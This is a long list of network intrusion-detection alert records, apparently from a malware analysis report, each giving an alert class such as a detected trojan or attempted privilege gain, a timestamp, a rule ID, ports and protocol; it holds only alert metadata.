                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:49.853581
                      SID:2025132
                      Source Port:38300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.162873
                      SID:2027339
                      Source Port:59080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.051223
                      SID:2835222
                      Source Port:57250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2829579
                      Source Port:34014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.333329
                      SID:2025132
                      Source Port:40926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.017676
                      SID:2025132
                      Source Port:48126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.797833
                      SID:2025132
                      Source Port:43292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.546980
                      SID:2027339
                      Source Port:46136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2025132
                      Source Port:35490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.775925
                      SID:2027339
                      Source Port:53286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.580139
                      SID:2835222
                      Source Port:52192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2835222
                      Source Port:50446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531088
                      SID:2027339
                      Source Port:60664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.071724
                      SID:2027339
                      Source Port:57188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.887085
                      SID:2831300
                      Source Port:56916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.112994
                      SID:2027339
                      Source Port:43694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.457187
                      SID:2025132
                      Source Port:34552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.724116
                      SID:2027339
                      Source Port:51922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.118555
                      SID:2027339
                      Source Port:52672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.323671
                      SID:2027339
                      Source Port:35554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2829579
                      Source Port:57386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449068
                      SID:2027339
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.503671
                      SID:2025132
                      Source Port:42322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2829579
                      Source Port:43368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2829579
                      Source Port:55942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.786723
                      SID:2027339
                      Source Port:38870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.863423
                      SID:2831300
                      Source Port:35272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:48.642445
                      SID:2027339
                      Source Port:39126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.399812
                      SID:2027339
                      Source Port:50938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.224203
                      SID:2831300
                      Source Port:50696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.366780
                      SID:2831300
                      Source Port:45676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.314338
                      SID:2025132
                      Source Port:37080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2829579
                      Source Port:58484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468948
                      SID:2831300
                      Source Port:59298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2829579
                      Source Port:53492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.662240
                      SID:2027339
                      Source Port:54332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.466939
                      SID:2831300
                      Source Port:51586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.061851
                      SID:2025132
                      Source Port:43348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.042794
                      SID:2027339
                      Source Port:54424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.561842
                      SID:2027339
                      Source Port:44518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.206449
                      SID:2027339
                      Source Port:39128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2835222
                      Source Port:55992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.572723
                      SID:2027339
                      Source Port:36718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.354742
                      SID:2835222
                      Source Port:34872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.238429
                      SID:2027339
                      Source Port:33582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2829579
                      Source Port:60568
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.166360
                      SID:2027339
                      Source Port:56306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.902488
                      SID:2025132
                      Source Port:55584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.570834
                      SID:2027339
                      Source Port:42698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.948371
                      SID:2025132
                      Source Port:60336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:25.857963
                      SID:2027339
                      Source Port:56838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.002176
                      SID:2027339
                      Source Port:50694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2829579
                      Source Port:59418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.261315
                      SID:2027339
                      Source Port:41306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.325754
                      SID:2829579
                      Source Port:60424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2835222
                      Source Port:48098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589589
                      SID:2027339
                      Source Port:48694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.403579
                      SID:2829579
                      Source Port:48232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2835222
                      Source Port:45740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.444445
                      SID:2831300
                      Source Port:52660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.516035
                      SID:2027339
                      Source Port:47248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.028397
                      SID:2831300
                      Source Port:39398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.152981
                      SID:2025132
                      Source Port:43760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.804016
                      SID:2025132
                      Source Port:50124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.061994
                      SID:2831300
                      Source Port:55016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2835222
                      Source Port:37954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.270058
                      SID:2027339
                      Source Port:40668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.426800
                      SID:2027339
                      Source Port:52206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.324002
                      SID:2831300
                      Source Port:40084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:35.355667
                      SID:2831300
                      Source Port:57874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.014309
                      SID:2027339
                      Source Port:39742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.649487
                      SID:2027339
                      Source Port:51276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.598486
                      SID:2025132
                      Source Port:49766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.993867
                      SID:2025132
                      Source Port:49580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.442724
                      SID:2027339
                      Source Port:57634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.706860
                      SID:2027339
                      Source Port:35324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.625834
                      SID:2027339
                      Source Port:37068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.277107
                      SID:2025132
                      Source Port:56096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.335286
                      SID:2027339
                      Source Port:50208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.576162
                      SID:2025132
                      Source Port:53510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.826739
                      SID:2025132
                      Source Port:58546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.747874
                      SID:2025132
                      Source Port:49584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.194540
                      SID:2025132
                      Source Port:36092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.219051
                      SID:2835222
                      Source Port:51312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.480553
                      SID:2027339
                      Source Port:45826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119232
                      SID:2831300
                      Source Port:45442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.943746
                      SID:2027339
                      Source Port:33872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.336092
                      SID:2025132
                      Source Port:37698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.179441
                      SID:2027339
                      Source Port:33046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.429987
                      SID:2835222
                      Source Port:54414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.159948
                      SID:2835222
                      Source Port:49888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.464785
                      SID:2027339
                      Source Port:40292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.176981
                      SID:2025132
                      Source Port:40288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.606361
                      SID:2025132
                      Source Port:43486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.315621
                      SID:2027339
                      Source Port:54682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.303078
                      SID:2831300
                      Source Port:42878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.565771
                      SID:2025132
                      Source Port:40816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.320815
                      SID:2027339
                      Source Port:42372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:53.423905
                      SID:2831300
                      Source Port:38156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.221858
                      SID:2025132
                      Source Port:48098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.251571
                      SID:2027339
                      Source Port:35252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2829579
                      Source Port:53782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.784582
                      SID:2831300
                      Source Port:44058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.747656
                      SID:2835222
                      Source Port:52158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.127943
                      SID:2835222
                      Source Port:36788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.096786
                      SID:2025132
                      Source Port:39608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.085078
                      SID:2027339
                      Source Port:57172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.004179
                      SID:2025132
                      Source Port:37314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:49.853581
                      SID:2027339
                      Source Port:55646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.260557
                      SID:2027339
                      Source Port:50038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.457644
                      SID:2027339
                      Source Port:34304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.342827
                      SID:2831300
                      Source Port:34366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.305486
                      SID:2025132
                      Source Port:58730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.491533
                      SID:2027339
                      Source Port:39374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.169467
                      SID:2027339
                      Source Port:49036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.688553
                      SID:2025132
                      Source Port:39172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.488770
                      SID:2027339
                      Source Port:51880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.828884
                      SID:2835222
                      Source Port:57716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2835222
                      Source Port:32904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2829579
                      Source Port:37420
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.459686
                      SID:2831300
                      Source Port:53016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.659617
                      SID:2829579
                      Source Port:58576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.772789
                      SID:2025132
                      Source Port:45810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:41.550251
                      SID:2027339
                      Source Port:52870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2829579
                      Source Port:49320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.396094
                      SID:2027339
                      Source Port:53806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.855214
                      SID:2831300
                      Source Port:52872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.466707
                      SID:2027339
                      Source Port:57458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.855356
                      SID:2027339
                      Source Port:42312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.595549
                      SID:2027339
                      Source Port:49858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.593936
                      SID:2831300
                      Source Port:55200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.246248
                      SID:2027339
                      Source Port:52912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.619289
                      SID:2835222
                      Source Port:36848
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.363153
                      SID:2025132
                      Source Port:59790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.535629
                      SID:2025132
                      Source Port:55374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:45.315463
                      SID:2027339
                      Source Port:34882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.577316
                      SID:2829579
                      Source Port:55448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.971446
                      SID:2027339
                      Source Port:57950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2829579
                      Source Port:49668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.518359
                      SID:2027339
                      Source Port:39294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.320646
                      SID:2027339
                      Source Port:51984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.628763
                      SID:2025132
                      Source Port:49684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2835222
                      Source Port:43062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.650758
                      SID:2027339
                      Source Port:41136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.535101
                      SID:2831300
                      Source Port:34958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.896425
                      SID:2025132
                      Source Port:53982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.501276
                      SID:2027339
                      Source Port:42268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2835222
                      Source Port:48960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:01.438132
                      SID:2027339
                      Source Port:58972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.953935
                      SID:2027339
                      Source Port:54078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.466916
                      SID:2027339
                      Source Port:36156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2829579
                      Source Port:43338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2829579
                      Source Port:58870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.712957
                      SID:2025132
                      Source Port:59088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.240839
                      SID:2025132
                      Source Port:50218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.518359
                      SID:2027339
                      Source Port:37524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.664506
                      SID:2831300
                      Source Port:43274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.365777
                      SID:2831300
                      Source Port:39866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.960840
                      SID:2027339
                      Source Port:54392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.698150
                      SID:2027339
                      Source Port:54962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2829579
                      Source Port:48294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.449806
                      SID:2027339
                      Source Port:45378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.096786
                      SID:2027339
                      Source Port:42028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.454602
                      SID:2025132
                      Source Port:38704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.185323
                      SID:2027339
                      Source Port:51958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2829579
                      Source Port:51998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.359487
                      SID:2027339
                      Source Port:52490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.374971
                      SID:2027339
                      Source Port:41830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.416560
                      SID:2835222
                      Source Port:56478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2829579
                      Source Port:36536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.405139
                      SID:2835222
                      Source Port:34882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2835222
                      Source Port:53940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.271822
                      SID:2829579
                      Source Port:59282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.771660
                      SID:2027339
                      Source Port:51772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.850972
                      SID:2025132
                      Source Port:50898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.611139
                      SID:2027339
                      Source Port:33898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.483885
                      SID:2027339
                      Source Port:39280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.037944
                      SID:2027339
                      Source Port:59668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2835222
                      Source Port:34978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.565815
                      SID:2831300
                      Source Port:37314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.460726
